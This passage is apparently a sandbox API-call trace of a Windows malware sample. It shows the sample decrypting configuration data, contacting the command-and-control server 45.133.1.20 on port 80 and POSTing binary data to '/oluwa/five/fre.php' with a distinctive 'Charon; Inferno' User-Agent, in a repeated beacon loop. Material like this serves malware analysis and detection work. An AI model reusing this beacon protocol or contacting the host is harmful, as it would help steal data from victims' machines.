phProv=0x19fca8*=0x0) returned 1 [0253.093] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.093] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0253.101] GetProcessHeap () returned 0x6a0000 [0253.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0253.102] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.103] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0253.104] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.104] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0253.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.105] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0253.105] GetProcessHeap () returned 0x6a0000 [0253.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0253.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.108] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0253.109] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.110] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0253.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.111] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0253.111] GetProcessHeap () returned 0x6a0000 [0253.111] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0253.112] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.113] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0253.114] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.114] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0253.115] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.115] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0253.116] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.116] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0253.116] GetProcessHeap () returned 0x6a0000 [0253.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0253.116] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0253.116] GetProcessHeap () returned 0x6a0000 [0253.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa20 [0253.117] socket (af=2, type=1, protocol=6) returned 0x868 [0253.117] connect (s=0x868, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0253.144] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0253.144] GetProcessHeap () returned 0x6a0000 [0253.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0253.144] GetProcessHeap () returned 0x6a0000 [0253.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0253.145] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0253.243] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0253.243] GetProcessHeap () returned 0x6a0000 [0253.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba678 [0253.243] GetProcessHeap () returned 0x6a0000 [0253.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0253.243] GetProcessHeap () returned 0x6a0000 [0253.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0253.244] GetProcessHeap () returned 0x6a0000 [0253.244] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0253.245] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0253.246] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0253.246] GetProcessHeap () returned 0x6a0000 [0253.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0253.246] GetProcessHeap () returned 0x6a0000 [0253.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0253.246] send (s=0x868, buf=0x6bd460*, len=242, flags=0) returned 242 [0253.247] send (s=0x868, buf=0x6bb998*, len=159, flags=0) returned 159 [0253.247] GetProcessHeap () returned 0x6a0000 [0253.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0253.247] recv (in: s=0x868, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0253.328] GetProcessHeap () returned 0x6a0000 [0253.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0253.329] GetProcessHeap () returned 0x6a0000 [0253.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0253.330] GetProcessHeap () returned 0x6a0000 [0253.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba678 | out: hHeap=0x6a0000) returned 1 [0253.331] GetProcessHeap () returned 0x6a0000 [0253.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0253.331] closesocket (s=0x868) returned 0 [0253.332] GetProcessHeap () returned 0x6a0000 [0253.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa20 | out: hHeap=0x6a0000) returned 1 [0253.332] GetProcessHeap () returned 0x6a0000 [0253.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0253.333] GetProcessHeap () returned 0x6a0000 [0253.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0253.333] GetProcessHeap () returned 0x6a0000 [0253.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0253.334] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1598) returned 0x868 [0253.337] Sleep (dwMilliseconds=0xea60) [0253.339] GetProcessHeap () returned 0x6a0000 [0253.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0253.340] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.341] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0253.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.353] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0253.371] GetProcessHeap () returned 0x6a0000 [0253.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6da930 [0253.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.372] CryptImportKey (in: hProv=0x6bef48, pbData=0x6da930, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0253.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.373] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0253.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.374] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0253.374] GetProcessHeap () returned 0x6a0000 [0253.375] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da930 | out: hHeap=0x6a0000) returned 1 [0253.375] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.376] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0253.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.388] CryptDestroyKey (hKey=0x6ad020) returned 1 [0253.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.389] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0253.389] GetProcessHeap () returned 0x6a0000 [0253.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0253.392] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.393] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0253.393] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.394] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0253.394] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.395] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0253.395] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.396] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0253.396] GetProcessHeap () returned 0x6a0000 [0253.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0253.396] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0253.396] GetProcessHeap () returned 0x6a0000 [0253.396] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0253.397] GetProcessHeap () returned 0x6a0000 [0253.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0253.397] GetProcessHeap () returned 0x6a0000 [0253.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0253.397] GetProcessHeap () returned 0x6a0000 [0253.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0253.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.398] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0253.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.406] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0253.413] GetProcessHeap () returned 0x6a0000 [0253.413] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0253.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.414] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0253.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.415] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0253.416] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.416] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0253.416] GetProcessHeap () returned 0x6a0000 [0253.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0253.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.418] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0253.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.419] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0253.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.420] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0253.420] GetProcessHeap () returned 0x6a0000 [0253.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0253.421] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.421] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0253.422] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.422] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0253.425] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.425] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0253.425] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.426] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0253.426] GetProcessHeap () returned 0x6a0000 [0253.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0253.426] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0253.426] GetProcessHeap () returned 0x6a0000 [0253.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0253.426] socket (af=2, type=1, protocol=6) returned 0x86c [0253.426] connect (s=0x86c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0253.479] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0253.479] GetProcessHeap () returned 0x6a0000 [0253.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0253.479] GetProcessHeap () returned 0x6a0000 [0253.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0253.480] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0253.481] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0253.481] GetProcessHeap () returned 0x6a0000 [0253.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6db348 [0253.481] GetProcessHeap () returned 0x6a0000 [0253.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0253.482] GetProcessHeap () returned 0x6a0000 [0253.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0253.482] GetProcessHeap () returned 0x6a0000 [0253.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0253.483] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0253.485] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0253.485] GetProcessHeap () returned 0x6a0000 [0253.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0253.485] GetProcessHeap () returned 0x6a0000 [0253.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0253.486] send (s=0x86c, buf=0x6bd460*, len=242, flags=0) returned 242 [0253.486] send (s=0x86c, buf=0x6bb998*, len=159, flags=0) returned 159 [0253.487] GetProcessHeap () returned 0x6a0000 [0253.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0253.487] recv (in: s=0x86c, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0253.561] GetProcessHeap () returned 0x6a0000 [0253.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0253.561] GetProcessHeap () returned 0x6a0000 [0253.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0253.562] GetProcessHeap () returned 0x6a0000 [0253.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db348 | out: hHeap=0x6a0000) returned 1 [0253.563] GetProcessHeap () returned 0x6a0000 [0253.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0253.564] closesocket (s=0x86c) returned 0 [0253.564] GetProcessHeap () returned 0x6a0000 [0253.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0253.564] GetProcessHeap () returned 0x6a0000 [0253.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0253.565] GetProcessHeap () returned 0x6a0000 [0253.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0253.565] GetProcessHeap () returned 0x6a0000 [0253.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0253.567] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x159c) returned 0x86c [0253.569] Sleep (dwMilliseconds=0xea60) [0253.570] GetProcessHeap () returned 0x6a0000 [0253.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0253.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.572] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0253.584] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.584] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0253.596] GetProcessHeap () returned 0x6a0000 [0253.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0253.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.600] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0253.601] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.602] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0253.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.608] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0253.608] GetProcessHeap () returned 0x6a0000 [0253.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0253.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.612] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0253.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.613] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0253.614] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.614] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0253.614] GetProcessHeap () returned 0x6a0000 [0253.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0253.615] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.616] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0253.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.617] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0253.617] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.618] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0253.619] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.619] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0253.619] GetProcessHeap () returned 0x6a0000 [0253.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0253.619] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0253.619] GetProcessHeap () returned 0x6a0000 [0253.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0253.620] GetProcessHeap () returned 0x6a0000 [0253.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0253.620] GetProcessHeap () returned 0x6a0000 [0253.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0253.620] GetProcessHeap () returned 0x6a0000 [0253.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0253.621] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.622] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0253.628] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.628] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0253.638] GetProcessHeap () returned 0x6a0000 [0253.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0253.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.640] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0253.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.641] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0253.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 